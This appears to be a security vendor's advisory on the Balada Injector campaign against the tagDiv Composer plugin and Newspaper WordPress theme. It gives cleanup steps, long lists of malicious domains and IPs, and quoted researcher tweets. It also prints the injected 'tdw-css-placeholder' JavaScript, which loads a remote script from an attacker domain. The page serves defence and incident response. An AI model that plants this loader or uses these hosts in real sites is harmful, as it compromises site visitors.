According to the PublicWWW engine, there are approx. 81513 sites using the Newspaper theme and tagDiv plugin – more than 4600 sites still show signs of contamination.
MAGEFIX SecurityMalware cleanup & protectionTry our Free site check.
How to clean a website affected by tagDiv and Newspaper vulnerabilities.
- Backup the infected site, including database and web files – keep everything, including any suspicious file.
- Restore core files, plugins and themes, one by one, manually, making sure you’ll not use any files from the backup – start fresh. You may restore wp-config.php after a quick check.
- Make sure the /uploads/ folder is malware-free, look for .php & .zip files.
- After you got back a working WordPress site, check the dashboard and remove any suspicious admin users.
- Backup and review the wp_options table, it should include obfuscated code. Find and remove any malicious injection.
- Ask for a reindex via Google search console.
- Apply all the security updates available and use PHP version 7.4 or greater.
- Use Search Replace DB ver. 4.1.3 to replace malicious code inside wp_options.
- Scan all the sites hosted on the same server for cross-site contamination. If other sites are affected, isolate them and repeat the cleanup process for each.
If you seek professional help with cleanup and security updates, check our Platinum plan.
Malicious URLs:
https://assets.statisticscripts.com/ats/s.js
https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
hxxps://good.playerofsunshine[.]com/scripts/post.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js
https://content.streamfastcdn.com
https://wpemojii.com/wp-urlx.js
Malicious IPs: 45.140.146.101, 185.39.206.161, 80.66.79[.](247|253) Hyper Hosting SRL
45.140.146.101 > cdn.specialtaskevents.com
45.142.212.163 ( AS44477 )
assets.statisticscripts.com/ats/s.js
for.getsmallcount.com
css.statisticscripts.com
best.playerofsunshine.com
call.getsmallcount.com
five.startperfectsolutions.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
listwithstats.com
one.dataofpages.com
normal.playerofsunshine.com
dataofpages.com
good.playerofsunshine.com
statisticscripts.com
try.selectofmychoices.com
two.startperfectsolutions.com
view.listwithstats.com
js.statisticscripts.com
assets.statisticscripts.com
great.playerofsunshine.com
reget.statisticsplatform.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
new.listwithstats.com
cdn.statisticscripts.com
second.gybritanalytsesystem.com
slash.dataofpages.com
fifth.gybritanalytsesystem.com
four.startperfectsolutions.com
post.listwithstats.com
first.gybritanalytsesystem.com
first.dataofpages.com
page.listwithstats.com
one.startperfectsolutions.com
excelent.playerofsunshine.com
cdn.dataofpages.com
Malicious subdomains
80.66.79.250
store.bestselllerservice.com
80.66.79.251
follow.forwardstarlight.com
stay.forwardstarlight.com
west.statisticplatform.com
80.66.79.252
service.specialcraftbox.com
call.colorschemeas.com
soft.specialcraftbox.com
get.promsmotion.com
show.bridgelinering.com
net.promsmotion.com
go.bridgelinering.com
80.66.79.253
start.selectchoise.com
finish.selectchoise.com
gate.getmygateway.com
get.lightsteper.com
cdn.specialtaskevents.com
page.specialnewspaper.com
east.statisticsplatform.com
west.statisticplatform.com
west.statisticsplatform.com
80.66.79.249
special.beatifulllhistory.com
80.66.79.248
west.statisticplatform.com
goto.betradingway.com
give.selectchoise.com
north.statisticplatform.com
got.selectchoise.com
startup.betradingway.com
80.66.79.247
call.getsmallcount.com
get.statisticplatform.com
got.statisticplatform.com
come.statisticplatform.com
bee.selectofmychoices.com
best.playerofsunshine.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
normal.playerofsunshine.com
good.playerofsunshine.com
try.selectofmychoices.com
great.playerofsunshine.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
second.gybritanalytsesystem.com
fifth.gybritanalytsesystem.com
first.gybritanalytsesystem.com
excelent.playerofsunshine.com
Other domains used to inject malware inside the “tdw-css-placeholder” section. All are blacklisted by Sucuri Labs.
fast.quickcontentnetwork.com
gll.metricaga.com
ga.cdzanalytics.com
cdn.metricastats.com
syndication.gcdnanalytics.com
Just yesterday Sucuri SiteCheck scanned 135 sites with this the fast.quickcontentnetwork[.]com injection. They exploit the tagDiv Composer vuln. https://t.co/fLtRvF8Tv9
Previously used:
gll.metricaga[.com
ga.cdzanalytics[.com
cdn.metricastats[.com
syndication.gcdnanalytics[.com pic.twitter.com/TEPhyhsXZJ— Denis (@unmaskparasites) November 22, 2023
fromCharCode obfuscated code inside tdw-css-placeholder:
[‘fr’+’om’+String.fromCharCode(67
Malicious files & plugin folders: zexit.zip, wp-zexit, wp-swamp.
wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js
SiteCheck Sucuri
Malware Found, Known javascript malware: malware.injection?35.54
Known malware: malware.injection?35.59
Resource from a blacklisted domain fast.quickcontentnetwork.com
Malicious code
<style id="tdw-css-placeholder">.example{color:red}function isScriptLoaded(src){return Boolean(document.querySelector('script[src^="' + src + '"]'))}var bdBase="https://wpemojii.com/wp-urlx.js";var bd=bdBase+"?v="+Date.now();if (!isScriptLoaded(bdBase)){var d=document;var s=d.createElement('script');s.src=bd;s.type='text/javascript';s.onload=function(){console.log("Script başarıyla yüklendi!")};s.onerror=function(){console.log("Script yüklenirken bir hata oluştu.")};var scripts=d.getElementsByTagName('script');if (scripts.length){scripts[0].parentNode.insertBefore(s,scripts[0])}else{d.body.appendChild(s)}}else{console.log("Script zaten yüklendi.")}</style>
Decoded
CharCodemCharCriptateElementrcidntScriptentNodeertBeforeementsByTagNameadendChildmp_weather_scripthttps://assets.statisticscripts.com/ats/s.js
How this malware works:
Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins
Twitter @500mk500
#Balada malware campaign
forwardstarlight\.com
selectchoise\.com
statisticplatform\.comsubs:
follow.forwardstarlight\.com
give.selectchoise\.com
got.selectchoise\.com
north.statisticplatform\.com
stay.forwardstarlight\.com
west.statisticplatform\.comIPs: 80.66.79[.](248|251) https://t.co/XsXkPHhvbE
— Mikhail Kasimov (@500mk500) October 9, 2023
Decoded malware
Decoded west.statisticplatform[.]com/stats script. Same idea as in the promsmotion[.]com scripts described here https://t.co/BYpWYYulOR https://t.co/K5n33RJcG8 pic.twitter.com/DQacTJTrin
— Denis (@unmaskparasites) October 9, 2023